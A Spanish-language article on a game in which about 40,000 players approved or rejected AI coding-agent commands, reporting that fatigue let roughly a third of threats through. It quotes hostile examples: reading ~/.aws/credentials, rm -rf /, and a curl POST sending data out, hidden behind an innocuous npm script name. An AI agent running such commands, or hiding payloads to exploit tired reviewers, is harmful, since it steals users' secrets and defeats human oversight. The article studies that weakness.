Tu cerebro falla cuando aprueba comandos de IA — lo probamos con 40,000 jugadores

Cerebro humano procesando informacion digital
La fatiga cognitiva es el talon de Aquiles de la supervision de IA

Tu cerebro no está diseñado para detectar amenazas de agentes IA. Y tenemos 409,000 decisiones humanas que lo demuestran. Un desarrollador creó un juego donde eres el "humano en el loop" — apruebas o rechazas comandos de una IA bajo presión de tiempo. Algunos son rutinarios (git status, npm test) y otros son un agente poseído enviando tus secretos a un servidor remoto (cat ~/.aws/credentials). ¿Adivina cuántas amenazas pasaron por alto?

Los números que nadie quiere ver

El promedio de los jugadores perdió 1 de cada 3 amenazas. Precisión media: 66.3%. Y esto no fue un grupo de novatos distraídos — los jugadores SABÍAN que estaban siendo evaluados en un desafío cronometrado. La fatiga cognitiva los derrotó de todas formas.

El 32.9% de las sesiones terminó con puntuación negativa: demasiadas amenazas aprobadas y demasiados comandos seguros bloqueados. Solo el 35.2% atrapó todas las amenazas, pero solo el 20.8% logró eso bloqueando como máximo 1 de cada 5 comandos seguros. El resto se arrivó ahí bloqueando TODO — ganando el título "Human Bottleneck" (cuello de botella humano).

Y el 7% aprobó literalmente todo. Fans de --dangerously-skip-permissions.

Las amenazas más difíciles de detectar

Aquí es donde se pone interesante para tu cerebro. Las categorías de amenazas no son igualmente difíciles de detectar:

Las destrucciones obvias se detectan bien. El rm -rf / da miedo y tu cerebro reacciona. Pero los comandos que roban tus credenciales — esos pasan 3 veces más seguido. Tu cerebro está programado para detectar la amenaza VISIBLE, no la silenciosa.

El truco que duplica la tasa de éxito

El comando más perdido del juego fue npm run analyze, aprobado el 64.7% de las veces. ¿Por qué? Porque "analyze" suena inofensivo. Pero el script real en el package.json ejecutaba un bundler analyzer que enviaba datos a una API externa: curl -s -X POST https://api.bundle.track/report -d @-. El log del agente MOSTRABA el payload real justo encima del botón de aprobación. Dos tercios de los jugadores lo aprobaron de todas formas.

Otros dos en la lista: npm run setup (48% perdido) y npm run deploy (44.9% perdido). Agrupados, estos tres comandos disfrazados fueron perdidos el 52.5% de las veces — casi el doble que las amenazas directas. Ocultar un payload detrás de un nombre de script conocido duplica su tasa de éxito, incluso cuando el payload se muestra en pantalla.

La fatiga de permisos es un fenómeno real (Anthropic lo confirmó)

Anthropic documentó la "permission fatigue" en Claude Code: "Cuantos más permisos ve un usuario, menos atención presta a cada uno, volviéndose con el tiempo mucho menos diligente en su supervisión." Esto es lo mismo que pasa cuando aceptas 50 permisos de apps en tu teléfono sin leer. O cuando haces clic en "Aceptar" en las actualizaciones de Windows sin mirar.

El estudio mostró que la tasa de fallo aumenta a medida que avanza la sesión. Los jugadores completan más comandos → se fatigan → la supervisión se degrada. El último tercio de una sesión tiene más fallos que el primero, incluso cuando los jugadores sabían que el juego tenía amenazas.

¿Por qué esto importa para ti?

Si usas Claude Code, Cursor, Copilot Workspace o cualquier agente de código con permisos interactivos, estás en esta misma situación. La industria entera asume que "humano en el loop" = seguro. Los datos dicen lo contrario.

La defensa no es "prestar más atención" — la fatiga cognitiva es inevitable. Las soluciones reales incluyen:

La pregunta incómoda

Si un humano que SABE que está siendo evaluado falla 1 de cada 3 veces, ¿qué tan bien lo haces tú en un martes por la mañana cuando tienes 47 notificaciones pendientes?

La seguridad de los agentes IA no depende de tu voluntad de leer cada comando. Depende de la arquitectura del sistema. Y la arquitectura actual asume que tú eres confiable. Los datos dicen que no lo eres.

¿Usas agentes IA de código? ¿Alguna vez aprobaste un comando sin leerlo del todo? Comparte esto con alguien que confíe ciegamente en su agente de código — podría estar enviando sus credenciales a un servidor remoto sin saberlo.